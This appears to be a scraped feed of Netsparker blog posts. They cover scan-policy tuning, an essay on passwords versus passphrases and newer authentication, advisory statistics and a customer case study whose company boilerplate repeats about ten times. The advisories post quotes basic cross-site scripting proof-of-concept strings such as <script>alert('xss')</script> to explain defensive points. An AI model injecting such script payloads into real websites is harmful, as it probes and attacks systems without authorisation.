Although the default scan policies in Netsparker can be used to improve the efficiency of the web application security scans, you can further enhance the scans by creating your own scan policies. By fine tuning the scan policies you can also drastically reduce the time it takes to complete the security scans. To create your own scan policies you can create new policies or clone any of the existing ones as explained in Create Your Own Scan Policies with Netsparker Scan Policy Editor. Below are some examples of how you can tune your Netsparker scan policies.

Operating System Security Checks

If you know the operating system of the target web server you can switch off all the security checks for all other operating systems in the Command Injection, Command Injection (Blind) and Local File Inclusion checks groups. For example if the target web application is using Microsoft SQL Server as database backend and is running on Windows, it is recommend to:

  1. Make a clone of the default security policy All Security Checks (MS SQL)
  2. Navigate to the Command Injection checks group and disable all security checks for Linux as highlighted in the screenshot below.

Creating a new scan policy using the Netsparker Scan Policy Editor

  1. Do the same in the Command Injection (Blind) and Local File Inclusion checks groups.
  2. Once finished save the new scan policy and use it to launch your next web application security scan.

Note: Configuring your scan policy for the correct type of database server and operating system is very crucial. These types of security checks make a big difference on the performance and duration of the scan especially if the target website is big and complex. The rest of the optimizations listed below might not make a big impact but can still decrease the web application security scan time.

Scanning Custom Built Web Applications

If you will be scanning a custom built web applications where no off the shelf web application such as WordPress, Drupal and Joomla are being used, disable the group Web App Fingerprinting.

Web Server Security Checks

Netsparker also contains a number of web server security checks to help users identify security issues in web servers. Therefore if you know the type of web server the target web application is running on, for example IIS, you can safely switch off all other web server security checks such as those for Apache and Nginx. You can find web server security checks in the following groups:

  • Static Resources
  • Signatures
  • Mod negotiation (this is a specific Apache security check)

Web Application Framework Security Checks

There are several different web application frameworks available such as PHP and ASP.NET. Netsparker has specific security checks for each of them, hence if you know which web application framework was used to build the target web application you can safely switch off the security checks for all other frameworks. You can find web application frameworks security checks in the following groups:

  • Remote File Inclusion (disable this group if target is not using PHP)
  • Remote Code Evaluation
  • Expression Language Injection (disable this group if target is not using JAVA)
  • RoR Code Execution (disable this group if target is not using Ruby on Rails)
  • WebDAV (disable this group if target is not using WebDAV)
  • Signatures

Other Generic Checks

If you are not familiar with the target web application we do not recommend you to switch off any of the generic checks, but if you are you can also consider disabling the following security checks:

  • Backup Files; checks for backup files which could be downloaded from the target
  • Common Directories; checks for typical directories in target web application that could potentially expose confidential data, such as admin portals etc
  • Signatures; several security checks for web servers and web application frameworks, such as directory listing, version disclosure etc. Browse this group for more details about each check.

Even if you have access to the web server and ability to see the listings of all the files on the target web application I recommend you to keep these checks enabled unless you desperately need to cut down the scan duration time.

The Need to Optimize Web Application Security Scans

With just a bit of homework you can easily optimize the scan policies to benefit from quicker and more efficient web application security scans. If you compare the time it takes you to identify the operating system, web server, database backend and web application framework of a target web application to the time it takes for the scanner to complete all the security checks, you will find out that the latter takes much longer.

Hence I recommend you to spend those five or ten minutes fine tuning the scan policies before scanning a new web application.  And since you can save the scan policies, there is no need to do this procedure each time you scan a web application because you can have a scan policy for each web application you are scanning.

Passwords vs. Pass Phrases – Innovation and Evolution

0
0

This whitepaper is part of a three-part installment covering a wide breadth of topics on passwords, security, next-generation, and plenty more.  In this installment, we close the series with a look at the psychology of authentication itself, the latest generation of authentication, and modern applications. If you haven't read the first two installments, the links are; Passwords vs. Pass Phrases - An Ideological Divide and Passwords vs. Pass Phrases – Weaknesses Beyond the Password.

Preface

At the start of this series, we looked at several factors that weaken password-based authentication security, namely on the side of the end-user.  The concept of a password in and of itself is inherently flawed, and many of the surrounding security or enforcement strategies are equally flawed and antiquated.  By forcing this behavior on end users, content providers instill insecure authentication concepts in them, reinforced by the problem of a password itself.  In the second article, we explored that problem, reviewing how the ideology of a password is insecure, due to closing the end-user’s focus on a poor concept.  We continued on to exemplify how a simple restructuring of the password concept into pass phrases has a potentially revolutionary effect, most especially in web application security.  There are, however, those who have radically different ideas, and this article focuses on those and their potential applications.

Indeed, as we mentioned in the last article, “password-based authentication need not be such an archaic pillar of security any longer.”  The concept of a prompt-and-response authentication mechanism has been in existence since the Hellenistic Period, approximately 200 B.C., where Roman soldiers employed the use of watchwords – a memorized word repeated to an authenticator to prove identity.  The general concept remained the same for millennia, including its first use in computing with the 1961 Massachusetts Institute of Technology Compatible Time-Sharing System (MIT CTSS).  As one of the first time sharing computational systems, users of the system had authentication mechanisms to differentiate and privatize each point of entry terminal, capable even of accommodating multiple researchers at once.  Fast forward to today, and over 50 years later we have experienced the most unfathomable, unimaginable rapid evolution of technology – exploding from unaffordable and disconnected-from-the-world personal computers to a wireless, always-communicating computer in everyone’s pocket in just 10 short years.  And yet we still use the same authentication concept that has not changed since Polybius scribed about it in 150 B.C. and MIT implemented it in the CTSS (Compatible Time Sharing Systems).

Comfort Zone: Why We Use Ancient Concepts in a Modern Era

The concept of a password has indeed been around for millennia, but in terms of computing, the concept has remained relatively unchanged since authentication was first implemented and required in computing structures.  We still focus on simplistic concepts of authentication – a piece of (sometimes) public data, and a piece of private data, commonly in the form of a username and password combination – which have remained stable and constant since the 1961 MIT CTSS.  For quite some time now it has been a long-standing joke as to why maximum password length exists, especially to this day.  And, as is is part of the joke, no one really knows why anyone still enforces maximum length beyond the disappointing but often default answer: “It just has always been this way.”  Such is seemingly the concept for username and password authentication itself.  It just always has been this way, why change anything?

Much in life stays the same for long periods.  For millennia, society operated in nearly all facets of living very lackadaisically and without regard to improvement.  It sometimes takes decades or even centuries for a way of life to change from the norm.  “It’s always been this way” seems to be the common retort through time.  But we now live in an enlightened society of rich culture and liberties; of information zipping through the skies and giant fiber cables under the oceans; of a connected society where wireless internet devices outnumber their human users; of a time where new, revolutionary ideas are borne of brilliant minds, are fostered and explode into fortunes, and die all in less than a decade.  Thus, as we evolve from exceedingly limited connectivity to the most connected society in just 20 short years, so too do our technologies that propel us at near-immeasurable speed: cumbersome landlines to only cell phones, dialup to nationwide broadband, MySpace to Facebook to Twitter and all the social media in between.  We as a now rapidly and digitally evolving society must continue the trend of eschewing what “has always been this way,” and prepare for the evolution of web and other authentication mechanisms.

We Just Discussed Pass Phrases, What Happened to That?

Of course, passphrases are an incredible and delightfully simple step up in the evolution of authentication mechanisms – a concept we detail extensively and, of course, still support in the first installment of this series.  The concept of an obfuscated jumble of letters, numbers, and sometimes special characters in a non-sentence or phrase-like structure leads to very limited and measurably weak password security.  “In order to memorize this ideology of minimum 8 and maximum 32 characters, I have to make a jumbled mess that I can remember,” is often the train of thought that rushes through an end-user’s mind.  This concept yields passwords so weakened, their content can be cracked remarkably easily and swiftly in offline compromised password database cracks.

The use of a passphrase in lieu of a password is still of course a quite highly recommended solution, but only for as long as a username/password authentication combination remains.  Eventually, a newer, more permanent solution will need to replace this protocol.  Indeed, it is remarkable that the concept of a password has stuck around for so long, especially in the oceanic ether of highly dynamic and ever changing web trends.  The concept of a password has gone relatively unchanged, save for some additional length requirements, even in spite of the unending flow of compromises that occur and the enormous losses they yield all due at least in part to password-based authentication.

Some estimates that claim over ten million debit and credit card numbers are involved in mass compromises every year, resulting in tens of billions of dollars lost due to fraud.  (We visit this topic extensively in our PCI Compliance article series.)  A surprisingly large amount of this is the result of compromised financial data via online services, quite often due to a compromise of password database hashes.  Some password hash brute forcing software has the potential to yield several thousand user passwords an hour on some of the largest password hash dumps – over ten million cryptographic password hashes compromised from Comcast, Yahoo!, and AOL just this year alone.  Among multi-website authentication internet users, the majority use the same password across multiple websites.  This has been observed from the passwords cracked and successfully attempted on other websites by black-hat hackers during Pastebin’ed database compromises, like RockYou, where thirty million accounts were compromised with all passwords stored in plaintext – no cryptographic hashing whatsoever.  If just a small percentage of those compromised accounts use the same passwords for their PayPal or online banking logins, that still may result in hundreds of thousands, if not millions, in potential loss to fraud.

This all stems as a result of the fact that password hashing, regardless of whether using passwords or passphrases, are still only one-way cryptographic hashing algorithms.  There was once a time not at all long ago when it was still believed that fast cryptographic hashing algorithms -- MD5, SHA1, etc. -- were impenetrable enough and reasonably secure for the foreseeable future.  That quickly changed with newer technology and the speed in which modern graphical processing units (GPUs) chug through linear algebra.  With this almost absurd and astronomical rate of technology evolution over the past ten years, it stands to reason that even if we utilize some new, strong cryptographic hashing function with 20-plus character passphrases, it could be very soon that technology advances with the capability to crack it in mere hours.  This has become a near axiom of the cryptographic world: the world of password cracking is catching up to the world of cryptography at a frightening and alarming rate.  This is because all a computer has to do is successfully guess the contents of a password hash.  There is no data encoding and decoding procedure, no two-way handshake, or any real security mechanism for password hashing.  For something as indescribably crucial as account authentication mechanisms – something that should receive the utmost attention and scrutiny on security but sadly often does not – we utilize a remarkably weak and archaic system to protect sometimes the most confidential of data, all because of bad psychology.

Passwords: Satisfaction from Pseudo-Security

Psychology is defined as the study of mental functions and behaviors, but some have mused it is more a practice, perhaps an obsession ;) , of defining and naming each function and behavior.  The study of the mind is indeed mysterious in attempting to make sense of the wild phenomena that does not fit comfortable rationality or logic.  Through nearly every walk of life, humans perform acts of cognitive bias– actions or ways of thought that inhibit us from making rational and logic-driven decisions.  In some cases, such as instinctual behavior, it may in fact have life saving benefits.  However, bias often drives a person to operate in a subjective way they often know is illogical, but do so regardless due to functionality heuristics, social influence, or immediate gratification.  In terms of password-based authentication, one could argue that would be the direct influence to utilize allowably weak passwords (and the concept of a password altogether), commonality of a password authentication mechanism across all online authentication portals, and utilizing a cheaply memorizable passwords we know are weak at the cost of immediately bypassing the login restriction.

For over a decade and through the largest, most explosive growth in web systems, we have known our passwords are weak.  In 2006, a study of students showed many used insecure passwords despite knowing the security risks, only to have the ease of memorization.  As the study summarizes, many users employed the use of weak passwords, consisting of “lower case letters, numbers or digits, personally meaningful numbers and personally meaningful words when creating passwords, despite the fact that they realize that these methods may not be the most secure.”  In fact, passwords in general are largely psychological in nature.  Going further back, in 2002 a British psychologist, Dr. Helen Petrie, proclaimed passwords reveal largely psychological information about the user – childhood nicknames or pet names, familial information, and symbolic events headline the list.  Even to this day we hypothesize psychological reward systems for password security.  And, indeed, a simple scan of the contents of the RockYou database, and other brute-forced password hash compromises, shows these habits to still be true, over a decade later.  But the reality is that password-style authentication’s value lies solely in its psychology, not its security.
 
In 2010, two computer security researchers at Cambridge University – Joseph Bonneau and Sören Preibusch – released a study after analyzing over 150 news, e-commerce, social networking, and various other websites, all offering free accounts utilizing password-based authentication systems.  In their study, they, too, suggest that many websites utilize passwords “primarily for psychological reasons.”  They refer to the two primary purposes of such an authentication schema.  First, that the data collection and requirements process during enrollment are largely just to procure “marketing data,” a now normalized psychological transaction we perform as a sort of digital barter for ‘free’ information trade – you get content, advertisers get to learn about you, data for data.  Additionally and most definitively, however, they speculate that password systems exist largely as a “way to build trusted relationships” with end users.  However, they also suggest attempts to replace password authentication systems with more secure and modern mechanisms may fail because they do not reproduce the “entrenched ritual” of password-based authentication mechanisms.

There are indeed those who believe passwords are ultimately an invariable and solidified mechanism of authentication, an unbreakable pillar of e-society.  Even Microsoft acknowledged recently that weak passwords are a measurably acceptable risk if the account it protects yields low-value data (e.g. a website like RockYou where only social media game scores are stored, as opposed to an online bank account).  But these are absurd notions … mostly.  Of course, Slate’s Will Oremus is unarguably correct in some of his observations—the affordability of privacy and anonymity with a username/password authentication system is critical, especially in light of recent privacy concerns over spying and more; and the fact that password authentication will never truly die.  But using weak passwords where the risk is “acceptable” is a very bad judgment call.  By whose measure is the risk acceptable?  How do you proactively teach and ingrain into users the understanding of this acceptable risk and what a reasonable threshold is?  What happens if that “acceptable risk” website later decides to expand and house higher value private data?  These questions are minimally and ineffectively answered, if at all, and – this is the most crucial part – its success all rests squarely on the effectiveness of end-users not using the same password on multiple websites, a problem that has persisted for decades, if not since the dawn of online authentication systems.  And with events like the recent Russian compromise of over one billion passwords, the likelihood of compromising a critical account due to a weak password used elsewhere grows exponentially larger literally every day.

Regardless, Bonneau and Preibusch are perhaps quite right in a number of their observations, specifically the trusted relationship built by the psychologically entrenched ritual of username and password authentication still held onto firmly by its actors and participants – the web and other systems that employ them, and the end users who happily participate.  The user provides personal, fiscally valuable data in exchange for ‘exclusivity’ or niche service, solidifying the consummation of the accord between the two parties by an authentication schema.  One could reasonably assume any authentication system—password-based or otherwise—would yield the same or similar trusted bond between content provider and end user, but as also wisely speculated, newer and more secure authentication systems will meet heavy resistance.  In fact, some data suggests habit and belief are often doubled-down upon when challenged with better alternatives—even alternatives with considerable evidentiary support to the contrary of the held belief—which in and of itself would suggest considerable potential resistance to new authentication mechanisms.  Users have held so firmly onto this method for such a very long time, so to upset the foundation of their psychologically entrenched ritual seems implausible.  But, surprisingly, it is not implausible at all.   That resistance has already been met and bested by many remarkable and new technologies.  The aforementioned Cambridge study was released in 2010, and in just the four short years since we have witnessed some radical changes in authentication.

If Not Passwords, Then What Shall We Use?

As we mentioned at the start, wireless devices currently outnumber living human beings.  In fact, one estimate claims by 2020 wireless devices will outnumber humans six to one – encroaching 25 billion connected devices.  It is highly probable that nearly every human whom holds some form of an account somewhere that utilizes an authentication system – likely, of course, password-based – also possesses a wireless device, most likely a cellular phone.  These devices offer an additional layer to authentication systems, a mechanism often referred to as two-factor or multi-factor authentication.  In standard password-style authentication, the action performed is a one-factor authentication – you providing your username and password is the only asset utilized.  A two-factor authentication system continues this process by confirming this authentication (first factor), then looking up your second authentication system (second factor, and in many cases a cell phone or security token dongle) and challenging the user for a code produced exclusively by that device.  The concept behind two-factor authentication is that only you, the actual owner of the account, should be in possession of that second asset.  Assuming the sanctity of all secret data – such as those assets’ private keys – is retained, the system is purportedly impenetrable.  This additional method on top of password-based authentication has long been employed in many high-risk applications, such as government applications, online banking, and recently even online gaming.

The idea was a novel concept back in 2006, but eight years later has become a commonplace addition to online banking.  As far back as 2003, RSA implemented the use of two-factor authentication with its SecurID dongle, a token system used largely in governments and large corporate environments.  The SecurID system, however, did fall victim to a social engineering attack in 2011.  Even the massively popular online game World of Warcraft has employed the use of two-factor authentication for over four years.  Unfortunately, Blizzard’s Battle.net two-factor authentication system has also met its own difficulties from a carefully crafted trojan virus.  Many other corporations have utilized two-factor authentication, such as Google and many banking institutions, both of which have also been met with problems, as well.

These failures are important to note because they highlight that even better, two-factor authentication solutions are not a perfect solution.  Even so, the banking industry has noticed a significant drop in online banking fraudulent activity with the implementation of two-factor authentication.  Yahoo!, learning from its past compromises, has begun to heavily work with alternative open standard and decentralized authentication protocols like OAuth and OpenID, which has resulted in a measurably stronger security posture for the company and, of course, other organizations that utilize these API technologies.  More and more types of systems come into existence each year and reduce the exclusive reliability on passwords alone.  However, all these technologies require a cognitive challenge-and-response activity from the user, and although biometric systems have existed for decades, only within the past year or two have they truly made their way into commonplace authentication technologies.

Originally, IBM made headlines well over a decade ago with the fingerprint reader built into their ThinkPad laptop series.  However, these were usually not popular outside, again, government and large corporate environments.  More recently and, of course, far more famously, the Apple iPhone 5S and the Samsung Galaxy S5 have exploded the field of biometrics authentication into everyday life when they implemented fingerprint readers in their cell phone technology.  (Of course, both the iPhone 5S and the Galaxy S5 have almost immediately been bested by clever hacks and other methods of circumvention.)  And now the godfather institution of the Internet and many other unarguably badass technologies of the world, the Defense Advanced Research Projects Agency (DARPA), has jumped again into the game with their ‘Active Authentication’ program.  DARPA, in partnership with many research institutions, is turning various biometrics and behaviors into authentication mechanisms, such as hand gestures, predictable behavior patterns, even our language and grammatical choices – all these and more are potential authentication portals years or less down the road.

As for now, though, it seems that two-factor authentication (with cellular phone two-factor currently being the choice du jour) has led the race for the eventual retirement of passwords, but with the help of biometrics and other innovative ideas, passwords are being nudged out even quicker.  Indeed, it will not be long before the archaic notion of username and password in commonplace usage comes to an end not with a bang, but a fizzle, as modern and secure protocols slowly but surely take its place.  It is impossible to say what protocol will become the ultimate victor, but one thing is certain: while it will never truly and entirely go away, password-based authentication will soon be a museum piece much like the Massachusetts Institute of Technology Compatible Time-Sharing System it all started on.

What Can You Learn from 87 Advisories About Web Application Vulnerabilities?

0
0

We have been publishing advisories of vulnerabilities Netsparker Web Application Security Scanner identifies in open source web applications since 2011. Two years ago we published statistics about these identified web application vulnerabilities and to accompany these statistics, this year we have statistics about the advisories we publish. One thing that you will obviously notice is that the number of advisories we publish each year is increasing. In 2014 we published 45 advisories, almost one every week.

How Do We Find These Vulnerabilities?

Every developer has his or her own way of writing code. With such a variety of writing styles, web frameworks and technologies the challenge for us, or anyone else for that matter to develop a web vulnerability scanner that is able to automatically crawl and scan all type of web applications is very big. So to ensure that both Netsparker Web Application Security Scanner and Netsparker Cloud can automatically crawl and identify all possible attack surfaces and vulnerabilities in custom web applications we constantly scan a wide variety of open source web applications throughout the year. Through this process we identify both weaknesses in our own scanning engine, which we address with updates and also vulnerabilities in such web applications.

Why Do We Scan Open Source Projects?

There are several other reasons why we do such exercise apart from the one mentioned above. We could simply do our tests and not hassle about contacting the owners of this project. Though we understand that many open source projects do not have the adequate resources to ensure their web application is secure. Hence to give something back to the community we are helping these projects to ship more secure code, and hopefully improve the security of the internet in general. Secondly we do it to raise awareness on how easy it is to ship insecure code and how important it is to use the right security tools.

What Can We Learn from Netsparker Advisories?

The advisories we publish are like all other web application advisories, though there is always a lot to learn from them. To start off with let’s take a look at the graph below which shows how many advisories we published each year since 2011.

Graph showing the number of advisories Netsparker released since 2011

In total we published 87 advisories so far. In 2014 we published 45 advisories, as opposed to the 10 we published in 2011. One must also note that a whopping 53 of these advisories are about multiple vulnerabilities, so technically speaking we are talking on more than just 87 vulnerabilities.

Do these statistics mean that the state of security of web applications is decreasing? The answer is both yes and no. The drastic increase in the number of advisories we published is a result of:

  • As a company we are growing and so are our resources. In 2014 we scanned much more web applications than ever before. To be exact we scanned 97 different web applications.
  • We are constantly improving both the crawling and scanning technology hence our scanner is able to identify more attack surfaces and vulnerabilities than before.
  • The number of open source projects is also increasing, hence there is a bigger repertoire to choose from, and for us to scan.

At this stage it is very difficult to predict if things are improving or not because tools are also improving thus they are finding vulnerabilities which have never been detected before, maybe some of which have been around for years. Though within a few years’ time we should be able to tell better. Also note that this data is based only on the advisories we published only. For example as we have seen last year, there are many vulnerabilities which we identify yet we do not release an advisory. This year it is the same. There are a number of vulnerabilities which we identified though for some reason or another we never publish an advisory for them.

Type of Vulnerabilities in Advisories

The below graph shows the different types of vulnerabilities that were reported in the advisories since 2011. Cross-site scripting leads the pack - it was featured in 78 advisories. Second place goes for SQL Injection with 17 advisories, third is Local File Inclusion with 4 advisories etc.

Different types of web application vulnerabilities reported in Netsparker advisories

From our tests you can easily conclude that cross-site scripting vulnerabilities are by far the most common vulnerabilities. Not a surprise considering XSS made it to the OWASP Top 10 ever since. But what does this mean?

SQL Injection and other high impact vulnerabilities risks are clearly high - The direct impact of vulnerabilities such as SQL Injection and Remote File Inclusion are quite high. These type of vulnerabilities are widely exploited and are very popular in the media. Therefore there is more awareness on these vulnerabilities which means that more developers are aware of these high profile and high risk vulnerabilities, thus taking the necessary precautions.

Exploitation of XSS vulnerabilities is not easy - Exploiting an SQL Injection is a straightforward process when compared to exploiting a cross-site scripting vulnerability, which is a process that requires preparation, interaction and even luck sometimes. As a matter of fact very few junior penetration testers or security engineers, who are new to web application security ever properly exploited a XSS issue. Possibly all they have done is the typical

alert('XSS')

proof of concept, which is enough to prove that the vulnerability exists but undermines the actual impact of it. This causes XSS to not get enough attention, hence there is less awareness about it thus is considered as a low risk vulnerability. Although we know for a fact that big organizations have been hacked via XSS in the past, such as the Apache Foundation.

Frameworks support and general defense solutions against XSS are not good enough - To fix SQL Injection vulnerabilities you can just use "Prepared Statements". Yes there are the some super edge case scenarios where prepared statements are not enough, but in general you are covered, end of story. On the other hand, if you want to write web applications that are not vulnerable to XSS attacks you are in for a long and very complicated journey, irrelevant of the language or framework you are using. None of the frameworks available today have a complete and straightforward support against XSS. In fact when we analyzed all of the XSS vulnerabilities we found that more than half of these XSS issues output locations were:

"HTML Attribute" tags. i.e. <a href="" title="[VULNERABLE]">

 One might be surprised by this initially because normally the most basic XSS is within the HTML context, such as:

 <p>Something <script>alert('xss')</script></p>

 This further proves that there is not enough support from frameworks when it comes to cross-site scripting protection. As a matter of fact encoding input in HTML context is a well defined and solved problem. But what about encoding in places such as HTML attributes, inline CSS/JS or within CSS/JS blocks? This is more complicated and the depending on the usage default frameworks’ anti-XSS functions do not support it, for example if the attribute is wrapped with single quotes (‘), HTML encoding functions will not help you.

Therefore even when developers apply the correct function that works in another context, their web applications are still vulnerable to XSS because when the input reflected in an HTML attribute they need a different function. Many frameworks are trying to address this issue and there are some variants which have been addressed, but it will take at least a couple of more years before we can see solutions as close to the elegance of today's SQL Injection solutions.

How Bad is the Impact of an Exploited XSS Vulnerability?

There is a common misconception in the web application security industry that XSS is not a vulnerability you should worry about, as in it is not as dangerous as an SQL Injection. Therefore these results are not as alarming as they might seem. As explained in Web Application Security Misconception; Are All Vulnerabilities Equally Dangerous? XSS can be as dangerous as an SQL Injection. It is all about the context and attack avenues, so it should be given the same importance and attention when it comes to remediation.

Type of Web Technologies and Database Servers

Since 2011 in total we released advisories for 79 different projects. 45 of the vulnerabilities we identified were zero day. Though to give you an idea of the type of web applications we are scanning, most of them use MySQL server as database server although we have seen some which use NoDB.

The majority of the scanned open source web applications are written in PHP. Though we scanned and also found vulnerabilities in web applications written in .NET, JAVA, Python, Perl & CGI and Ruby on Rails.

The Shocking Truth of Vulnerabilities and Advisories

All of the above advisories are about vulnerabilities in 79 different open source web application projects. There are other vulnerabilities we know of but we haven’t released an advisory for. There are also thousands of other web applications available out there and this is just a fraction of what is out there. Therefore should you be alarmed?

I would say yes, we should be alarmed. Most of these open source web applications have many users and developers, some of which are also relatively popular. If such vulnerabilities are being missed, even with the exposure they get and with so many eyeballs analysing the source code, how can you still be sure that your website is secure? Is your custom web application being tested enough to withstand a malicious attack? When you look at the state of security of these projects you start realizing how badly written many web applications are, and how important it is to use the right tools to ensure you develop and use secure web applications.

And to close this article on a high, here is an interesting statistic; out of the 79 projects we tried to get in touch with 45 of them never got back to us. Why is this interesting? Well let me just say that most of those who never got back to us are relatively popular and active projects in their niche. Some of them even have commercial extensions or are available commercially.

Unify Uses Netsparker to Keep Fortune 500 Companies Safe from Vulnerabilities and Security Flaws

0
0

“Netsparker is the best Web Application Security Scanner in terms of price-benefit balance. It is a very stable software, faster than the previous tool we were using and it is relatively free of false positives, which is exactly what we were looking for,”Harald Nandke, Principal Consultant, Unify.

Unify LogoUnify is one of the world’s leading communications software and services firms, providing integrated solutions to approximately 75 percent of the Fortune Global 500 companies. The solutions they offer unify multiple networks, devices and applications into one easy-to-use platform that allows teams to engage in rich and meaningful conversations. Unify has a strong heritage of product reliability, innovation, open standards and security.

Unify’s Need for Web Application Security

Unify develops web-based products, and also provides security services and penetration tests. For a company that is proud of its 160 years of experience in communications technology, it cannot afford to ship vulnerable web applications or not identify all vulnerabilities on a customer’s web application during a penetration test.

To retain its healthy customer base and ensure growth, Unify leads by example: the tools that its security professionals use to scan the web applications that are shipped with their own products are also used for all customers’ penetration tests. By doing so, Unify also ensures that all customers get the best possible service: one that they trust themselves.

The Challenge to Identify All Vulnerabilities and Security Flaws

Some years ago, Unify security professionals used to perform manual penetration tests. However, as both their products and customers’ web applications grew and became more complex, they needed security tools to keep up with all the new web development frameworks, as well as the growing demand.

By using the right security tools, Unify’s security professionals could automate most of the processes and, at the same time, confirm that all potential attack surfaces of a web application were identified. Therefore, by combining manual testing and automated scans Unify’s security team could not only save on time and costs, but would also ensure that no stone was left unturned, and that all vulnerabilities and security flaws were identified.

Sourcing the Right Web Application Security Scanner

Finding the right web application security scanner is not easy when you need to scan thousands of websites and web applications that are built with so many different web frameworks and run on a variety of web servers.

Considering the urgency of the matter, Unify’s security professionals opted for a popular commercial tool, though it soon let them down because of the high amount of false positives it reported. False positives are a big productivity killer, because rather than relying on the scanner’s results you have to verify its findings, hence losing all the benefits of automation.

Unify’s security experts decided to dig deeper into automation technology. “When we looked around in 2011 for a new web application security scanner, we tested several tools,” said Harald Nandke, Principal Consultant at Unify. “Netsparker was the best in terms of price-benefit balance. It is a very stable software, faster than the previous tool we were using and it is relatively free of false positives, which is exactly what we were looking for,” added Nandke.

Unify and Netsparker’s Strong Partnership

Unify has been using Netsparker Web Application Security Scanner for almost four years. They scan at least thirty web applications per month and this number is expected to grow. Such a strong partnership could not be possible without outstanding product support, especially in this complex and always evolving industry.

“We used Netsparker’s support from time to time and the experience was very good. We are satisfied with the response time and also with the service and solution quality,” said Nandke.

Netsparker has become a valuable tool in Unify’s security toolbox. It enables its security professionals to efficiently scan their own web applications, as well as their customers’, to highlight the most important security threats before the manual tests complete the penetration test.

About Netsparker Web Application Security Scanner

Netsparker Ltd is a young and enthusiastic UK based company focused on developing automated web security products, mainly the false positive free Netsparker Web Application Security Scanner and Netsparker Cloud. Netsparker managemetn and engineers have more than two decades of experience in the web application security industry that is reflected in their products, Netsparker Web Application Security Scanner and Netsparker Cloud. Founded in 2009, Netsparker's automated web vulnerability scanners are the leading security tools and are used by world renowned organizations such as Samsung, NASA, Skype, Vodafone, ING Bank and Ernst & Young.

About Unify

Unify is a global communications software and services company. They unify their customers’ communications systems. By synchronizing technologies, creating an engaging user experience and weaving communications seamlessly into the way businesses operate, they empower an increasingly mobile workforce to work better together. The result is a transformation of how the enterprise communicates and collaborates that amplifies collective efforts, energizes the business and drives better performance.

Netsparker Ltd is a young and enthusiastic UK based company focused on developing automated web security products, mainly the false positive free Netsparker Web Application Security Scanner and Netsparker Cloud. Netsparker management and engineers have more than two decades of experience in the web application security industry that is reflected in their products, Netsparker Web Application Security Scanner and Netsparker Cloud. Founded in 2009, Netsparker’s automated web vulnerability scanners are the leading security tools and are used by world renowned companies such as Samsung, NASA, Skype, ING bank and Ernst & Young.
Netsparker Ltd is a young and enthusiastic UK based company focused on developing automated web security products, mainly the false positive free Netsparker Web Application Security Scanner and Netsparker Cloud. Netsparker management and engineers have more than two decades of experience in the web application security industry that is reflected in their products, Netsparker Web Application Security Scanner and Netsparker Cloud. Founded in 2009, Netsparker’s automated web vulnerability scanners are the leading security tools and are used by world renowned companies such as Samsung, NASA, Skype, ING bank and Ernst & Young.
Netsparker Ltd is a young and enthusiastic UK based company focused on developing automated web security products, mainly the false positive free Netsparker Web Application Security Scanner and Netsparker Cloud. Netsparker management and engineers have more than two decades of experience in the web application security industry that is reflected in their products, Netsparker Web Application Security Scanner and Netsparker Cloud. Founded in 2009, Netsparker’s automated web vulnerability scanners are the leading security tools and are used by world renowned companies such as Samsung, NASA, Skype, ING bank and Ernst & Young.
Netsparker Ltd is a young and enthusiastic UK based company focused on developing automated web security products, mainly the false positive free Netsparker Web Application Security Scanner and Netsparker Cloud. Netsparker management and engineers have more than two decades of experience in the web application security industry that is reflected in their products, Netsparker Web Application Security Scanner and Netsparker Cloud. Founded in 2009, Netsparker’s automated web vulnerability scanners are the leading security tools and are used by world renowned companies such as Samsung, NASA, Skype, ING bank and Ernst & Young.
Netsparker Ltd is a young and enthusiastic UK based company focused on developing automated web security products, mainly the false positive free Netsparker Web Application Security Scanner and Netsparker Cloud. Netsparker management and engineers have more than two decades of experience in the web application security industry that is reflected in their products, Netsparker Web Application Security Scanner and Netsparker Cloud. Founded in 2009, Netsparker’s automated web vulnerability scanners are the leading security tools and are used by world renowned companies such as Samsung, NASA, Skype, ING bank and Ernst & Young.
Netsparker Ltd is a young and enthusiastic UK based company focused on developing automated web security products, mainly the false positive free Netsparker Web Application Security Scanner and Netsparker Cloud. Netsparker management and engineers have more than two decades of experience in the web application security industry that is reflected in their products, Netsparker Web Application Security Scanner and Netsparker Cloud. Founded in 2009, Netsparker’s automated web vulnerability scanners are the leading security tools and are used by world renowned companies such as Samsung, NASA, Skype, ING bank and Ernst & Young.
Netsparker Ltd is a young and enthusiastic UK based company focused on developing automated web security products, mainly the false positive free Netsparker Web Application Security Scanner and Netsparker Cloud. Netsparker management and engineers have more than two decades of experience in the web application security industry that is reflected in their products, Netsparker Web Application Security Scanner and Netsparker Cloud. Founded in 2009, Netsparker’s automated web vulnerability scanners are the leading security tools and are used by world renowned companies such as Samsung, NASA, Skype, ING bank and Ernst & Young.
Netsparker Ltd is a young and enthusiastic UK based company focused on developing automated web security products, mainly the false positive free Netsparker Web Application Security Scanner and Netsparker Cloud. Netsparker management and engineers have more than two decades of experience in the web application security industry that is reflected in their products, Netsparker Web Application Security Scanner and Netsparker Cloud. Founded in 2009, Netsparker’s automated web vulnerability scanners are the leading security tools and are used by world renowned companies such as Samsung, NASA, Skype, ING bank and Ernst & Young.
Netsparker Ltd is a young and enthusiastic UK based company focused on developing automated web security products, mainly the false positive free Netsparker Web Application Security Scanner and Netsparker Cloud. Netsparker management and engineers have more than two decades of experience in the web application security industry that is reflected in their products, Netsparker Web Application Security Scanner and Netsparker Cloud. Founded in 2009, Netsparker’s automated web vulnerability scanners are the leading security tools and are used by world renowned companies such as Samsung, NASA, Skype, ING bank and Ernst & Young.
Netsparker Ltd is a young and enthusiastic UK based company focused on developing automated web security products, mainly the false positive free Netsparker Web Application Security Scanner and Netsparker Cloud. Netsparker management and engineers have more than two decades of experience in the web application security industry that is reflected in their products, Netsparker Web Application Security Scanner and Netsparker Cloud. Founded in 2009, Netsparker’s automated web vulnerability scanners are the leading security tools and are used by world renowned companies such as Samsung, NASA, Skype, ING bank and Ernst & Young.

Netsparker Cloud or Netsparker Desktop?

0
0

As most of you know we are working on a new product; Netsparker Cloud. We are already planning the release so it should be available to the public very soon. In the meantime you can still apply for a Netsparker Cloud trial, so go ahead and give it a shot. As the name implies, Netsparker Cloud is an online web application security scanner. Since we are providing both a desktop scanner and an online scanning solution, people started asking us which option should they go for, or which one is the best.

As such no product is better than the other. It all depends on your requirements. In this article I will take a deeper look into each of the products' scopes and features to help you come up with your own answer.

Netsparker Crawling and Scanning Technology

